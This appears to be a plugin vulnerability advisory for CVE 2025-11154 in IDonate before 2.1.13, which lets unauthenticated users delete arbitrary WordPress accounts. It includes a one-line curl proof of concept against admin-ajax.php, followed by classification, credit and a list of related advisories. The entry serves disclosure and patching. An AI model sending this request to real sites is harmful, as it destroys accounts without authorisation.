IDonate < 2.1.13 – Unauthenticated User Deletion | CVE 2025-11154 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF when deleting users via an action handler, allowing unauthenticated attackers to delete arbitrary users.

Proof of Concept

```
curl -X POST http://example.com/wp-admin/admin-ajax.php   -H "Content-Type: application/x-www-form-urlencoded"   -d "action=panding_donor_action&target=delete&userid=<<INSERT_USER_ID>>"
```

Where `<<INSER_USER_ID>>` is a valid numeric User ID.

Affects Plugins

Fixed in 2.1.13

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

fdb9e076-4c65-4fd1-b1f6-23c23a11bdb7

Timeline

Publicly Published

2025-10-06 (about 2 months ago)

Added

2025-10-06 (about 2 months ago)

Last Updated

2025-10-06 (about 2 months ago)

Other

Published

Title

Published

2025-12-15

Title

Wbcom Designs < 2.1.2 - Missing Authorization

Published

2024-06-28

Title

Zita Elementor Site Library < 1.6.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

Published

2022-09-05

Title

Ldap WP Login / Active Directory Integration < 3.0.2 - Unauthenticated Settings Update to Auth Bypass

Published

2022-03-11

Title

Material Design for Contact Form 7 <= 2.6.4 - Subscriber+ Arbitrary Settings Update leading to DoS

Published

2025-02-28

Title

IP2Location Redirection < 1.33.4 - Missing Authorization to Unauthenticated Settings Export